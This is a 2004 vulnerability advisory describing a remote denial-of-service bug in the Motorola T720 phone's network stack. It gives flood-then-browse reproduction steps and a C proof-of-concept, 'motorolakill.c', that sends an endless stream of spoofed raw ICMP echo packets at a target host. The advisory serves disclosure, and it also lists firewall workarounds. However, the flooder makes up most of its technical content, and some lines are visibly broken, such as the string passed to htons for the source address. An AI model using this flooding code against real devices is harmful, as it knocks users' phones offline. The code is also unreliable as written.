~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product:  Motorola T720 Cell phones
              http://www.motorola.com
Versions:     T270
Bug:          DoS vulnerability
Impact:       Attacker's can reboot the cellphone 
              remotely.
Date:         March 01, 2004
Author:       Shaun Colley
              Email: shaunige@yahoo.co.uk
              WWW: http://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

"The Motorola T720 proves that the best technological
innovations carefully balance excitement and fun with
convenience and simplicity of use. Improve your
productivity and be one step ahead of the crowd with
digital customization and applications, or just kick
back and have a good time with creative entertainment
and messaging features. Either way, this phone is sure
to deliver a rich, compelling and truly unforgettable
wireless experience." - Vendor's website
(http://www.motorola.com).

The Motorola T720 cell phone is a very nice cell
phone, with plenty of fun features, including WAP
access to the Internet.  Unfortunately, there is a
low-risk vulnerability which allows an attacker to
remotely reboot the cell phone easily.



The bug
########

The vulnerability lies within the TCP/IP stack of the
Motorola T720 cell phone.  When the phone receives an
abnormal amount of IP traffic, the phone powers-off
when the user attempts to access the network (e.g
through the WAP browser).  

The vulnerability can be reproduced in the following
way:

-
1) Connect the phone to the Internet.
2) Flood the device with IP traffic (i.e SYN packets
or ICMP_ECHO requests (ping packets)).
3) Run the WAP browser.
-

At this point, the phone should power-off, and lose
network connectivity.

--
NOTE:

This vulnerability is likely due to a bug in the
phone's IP implementation which bails when a certain
backlog of IP packets is exceeded.
--


The exploit
############

A simple proof-of-concept is demonstrated below:


# motorolakill.c
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

int main(int argc, char *argv[]) {
        if(argc < 2) {
                printf("Usage: %s <host>\n", argv[0]);
                exit(0);
        }

        int sock;
        char packet[5000];
        int on = 1;
        struct sockaddr_in dest;
        struct hostent *host;
        struct iphdr *ip = (struct iphdr *) packet;
        struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
        if((host = gethostbyname(argv[1])) == NULL) {
                printf("Couldn't resolve host!\n");
                exit(-1);
        }

        if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
                printf("Couldn't make socket!\n");
                printf("You must be root to create a
raw socket.\n");
                exit(-1);
        }

        if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL,
(char *)&on, sizeof(on))) < 0) {
        perror("setsockopt");
        exit(1);
        }

        dest.sin_family = AF_INET;
        dest.sin_addr = *((struct in_addr
*)host->h_addr);
        ip->ihl = 5;
        ip->id = htons(1337);
        ip->ttl = 255;
        ip->tos = 0;
        ip->protocol = IPPROTO_ICMP;
        ip->version = 4;
        ip->frag_off = 0;
        ip->saddr = htons("1.3.3.7");
        ip->daddr = inet_ntoa(dest.sin_addr);
        ip->tot_len = sizeof(struct iphdr) +
sizeof(struct icmphdr);
        ip->check = 0;
        icmp->checksum = 0;
        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        printf("Ping flooding %s!\n", argv[1]);

        /* begin flooding here. */
        while(1) {
                sendto(sock, packet, ip->tot_len, 0,
(struct sockaddr *)&dest, sizeof(struct sockaddr));
        }
        return(0);
}
# EOF motorolakill.c


Use the steps listed above to reproduce the
vulnerability.  The above programs shouldn't need long
to cause the phone to poweroff.

(please note the phone will only poweroff if the user
attempts to access the network.  If the phone is
sitting idle, it won't be affected.  The user must
open the WAP browser during the attack, for example. 
This will cause the phone to poweroff quickly.)



The fix
########

No solution exists.  Possible workarounds are:

- Connect the phone through a router (possibly via GSM
to allow roaming), filtering out all malicious traffic
to the device.

- Use another system as a gateway system, firewalling
the cellphone, and filtering traffic to the device.



Vendor Status
##############

I have contacted the vendor regarding this low-risk
vulnerability.  I shall update this if I get a
response, depending on whether Motorola verify issue
to be serious enough, or even an issue at all.





Thank you for your time.
Shaun.



  
  
    
___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping" 
your friends today! Download Messenger Now 
http://uk.messenger.yahoo.com/download/index.html